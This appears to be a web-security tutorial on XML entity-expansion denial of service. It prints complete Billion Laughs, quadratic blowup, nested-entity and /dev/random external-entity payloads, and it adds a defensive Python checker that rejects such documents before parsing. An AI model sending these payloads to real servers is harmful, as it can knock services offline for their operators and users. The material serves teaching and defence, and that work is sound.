XML entities can also be used to perform a Denial of Service (DoS) attack on web applications by making the parser expand entity references. Consider the example below:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE book [
  <!ENTITY msg "Hello world">
]>
<book>
  <name>&msg;</name>
  <author>Nobody</author>
  <price>0000</price>
</book>
Output :
Now, if we modify the XML entity like this:
poc.xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE book [
  <!ENTITY msg "Hello world ">
  <!ENTITY msg1 "&msg;&msg;&msg;&msg;&msg;&msg;&msg;&msg;">
]>
<book>
  <name>&msg1;</name>
  <author>Nobody</author>
  <price>0000</price>
</book>
Now the message is repeated again and again (each reference to msg1 expands to eight copies of msg).
Output :
XML Billion Laughs :
In the Billion Laughs attack an entity with the value "lol" is declared, and then further entities are declared that each reference the previous one ten times (or more), which forces the XML parser to allocate memory for every expanded entity reference. As a result a huge amount of memory is consumed, which causes the server to crash. Nowadays this kind of attack is detected by XML parsers, which immediately stop parsing the document. An example of this attack is:
bl.xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE book [
  <!ENTITY lol "lol">
  <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
  <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
  <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
  <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
  <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
  <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
  <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
  <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
  <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
  <!ENTITY lol10 "&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;">
]>
<book>
  <name>&lol10;</name>
  <author>Nobody</author>
  <price>0000</price>
</book>
Output :
As we can see, the attack is detected by the XML parser. Also note that you can use anything in place of "lol".
"/dev/random" method :
This is another method to perform a DoS attack through XML entities. Here the XML parser is forced to read the /dev/random file, which never reaches end-of-file, so the parser blocks while trying to load the entity.
dos.xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE book [
  <!ENTITY dos SYSTEM "file:///dev/random">
]>
<book>
  <name>&dos;</name>
  <author>Nobody</author>
  <price>0000</price>
</book>
Output :
As we can see in the figure above, sending the above payload several times causes the server to slow down, and when we then try to load the page it does not load.
XML Quadratic Blowup :
The Quadratic Blowup attack is based on the Billion Laughs attack, but it does not use nested entity references the way Billion Laughs does. In a Quadratic Blowup attack, a single entity with a very large value is declared and then referenced thousands of times within the XML document, which causes the server to slow down or sometimes crash.
qbl.xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE book [
  <!ENTITY dos "DOSDOSDOSDOSDOSD.....OSDOSDOSDOSDOSDOS">  <!-- 1000... iterations of 'DOS' -->
]>
<book>
  <name>&dos;&dos;&dos;......&dos;&dos;&dos;</name>  <!-- 1000... iterations of '&dos;' -->
  <author>Nobody</author>
  <price>0000</price>
</book>
The above XML document declares an entity dos with the value "DOS..." (1000 repetitions) and references it 1000 times in the document. Sending these kinds of crafted requests is easily automated with Python libraries like requests.
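The Billion Laughs, /dev/random and Quadratic Blowup payloads above all rely on the same property: the parser does work proportional to the expanded document, not to the bytes it received. The following Python script is an added example, not code from the post or its GitHub repository. It is a defensive pre-flight check that reads the DOCTYPE internal subset, refuses external (SYSTEM/PUBLIC) and recursive entities, and computes the expanded size of the document with memoisation, so the Billion Laughs DTD is costed in a few dozen operations instead of building a 30 GB string. The regular expressions, the helper names (split_doctype, declared_entities, expanded_size, analyze, is_safe, book, billion_laughs) and the thresholds of one million characters and 100x amplification are assumptions for this example; the sample documents are constructed to match the post's poc.xml, bl.xml, dos.xml and qbl.xml. Python is used because the post itself mentions automating the requests with Python.

```python
"""Pre-flight check for XML entity-expansion DoS payloads (nested entities,
Billion Laughs, quadratic blowup, external entities such as /dev/random).
Added example, not code from the original post. The DOCTYPE internal subset
is scanned with regular expressions (enough for the payloads shown, not a
full XML parser); thresholds in is_safe() are assumptions for the example."""
import re

DOCTYPE_RE = re.compile(r"<!DOCTYPE[^\[>]*\[(.*?)\]\s*>", re.S)
ENTITY_RE = re.compile(r'<!ENTITY\s+(\w+)\s+(SYSTEM|PUBLIC)?\s*"([^"]*)"', re.S)
REF_RE = re.compile(r"&(\w+);")


class UnsafeXML(Exception):
    """DTD construct the checker refuses outright (e.g. recursive entity)."""


def split_doctype(doc):
    """Return (internal subset, body after the DOCTYPE declaration)."""
    m = DOCTYPE_RE.search(doc)
    return ("", doc) if m is None else (m.group(1), doc[m.end():])


def declared_entities(subset):
    """Return (internal: name -> replacement text, external: [names])."""
    internal, external = {}, []
    for name, kind, value in ENTITY_RE.findall(subset):
        if kind:                    # SYSTEM/PUBLIC: a parser would open a file or URL
            external.append(name)
        else:
            internal[name] = value
    return internal, external


def expanded_size(text, entities, memo, stack):
    """Length of `text` once every &name; is recursively expanded. Memoised per
    entity, so the 3*10**10-character Billion Laughs result is never built."""
    total, pos = 0, 0
    for ref in REF_RE.finditer(text):
        total += ref.start() - pos  # literal text before the reference
        pos = ref.end()
        name = ref.group(1)
        if name not in entities:    # &amp; etc. or undeclared: count literally
            total += ref.end() - ref.start()
            continue
        if name in stack:           # forbidden by XML (WFC: No Recursion)
            raise UnsafeXML(f"recursive entity &{name};")
        if name not in memo:
            stack.add(name)
            memo[name] = expanded_size(entities[name], entities, memo, stack)
            stack.discard(name)
        total += memo[name]
    return total + len(text) - pos  # trailing literal text


def analyze(doc):
    """Summarise how much the document grows when entities are expanded."""
    subset, body = split_doctype(doc)
    entities, external = declared_entities(subset)
    memo = {}
    body_size = expanded_size(body, entities, memo, set())
    return {"external": external, "entity_sizes": memo,
            "body_expanded": body_size,
            "amplification": body_size / max(len(doc), 1)}


def is_safe(doc, max_expansion=1_000_000, max_amplification=100.0):
    """Return (ok, reason); reject before handing the document to a real parser."""
    try:
        info = analyze(doc)
    except UnsafeXML as exc:
        return False, str(exc)
    if info["external"]:
        return False, f"external entities declared: {info['external']}"
    if info["body_expanded"] > max_expansion:
        return False, f"expands to {info['body_expanded']} characters"
    if info["amplification"] > max_amplification:
        return False, f"amplification factor {info['amplification']:.0f}x"
    return True, "ok"


# --- constructed sample documents in the shape used by the post --------------
def book(subset, name_content):
    return ('<?xml version="1.0" encoding="UTF-8"?>\n'
            f"<!DOCTYPE book [ {subset} ]>\n"
            f"<book><name>{name_content}</name>"
            "<author>Nobody</author><price>0000</price></book>")


def billion_laughs(depth=10, fanout=10):
    decls = ['<!ENTITY lol "lol">']
    for i in range(1, depth + 1):
        refs = ("&lol;" if i == 1 else f"&lol{i - 1};") * fanout
        decls.append(f'<!ENTITY lol{i} "{refs}">')
    return book(" ".join(decls), f"&lol{depth};")


HELLO = book('<!ENTITY msg "Hello world">', "&msg;")
POC = book('<!ENTITY msg "Hello world "> <!ENTITY msg1 "' + "&msg;" * 8 + '">', "&msg1;")
BILLION = billion_laughs()
DEV_RANDOM = book('<!ENTITY dos SYSTEM "file:///dev/random">', "&dos;")
QUADRATIC = book('<!ENTITY dos "' + "DOS" * 1000 + '">', "&dos;" * 1000)

if __name__ == "__main__":
    for label, d in [("hello", HELLO), ("poc", POC), ("billion_laughs", BILLION),
                     ("dev_random", DEV_RANDOM), ("quadratic", QUADRATIC)]:
        print(f"{label:15} {is_safe(d)}")
```

Run the file directly to see each constructed sample scored. The check is meant to sit in front of the real parser, not replace parser hardening: a deployment should still disable entity expansion and external entity resolution in the parser itself (in Python, for example, by parsing through defusedxml) so that a payload the regex scan does not recognise is still contained.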
The code used above can be downloaded from here : Github_link
XML Attacks Part 1 : Basic of XML structure and attack surface
XML Attacks Part 2 : XXE (XML eXternal Entity) Attack
XML Attacks Part 4 : Out Of Bound Attacks
Visit the link for more tutorials about Web Security : http://www.sec-art.net/p/web-security.html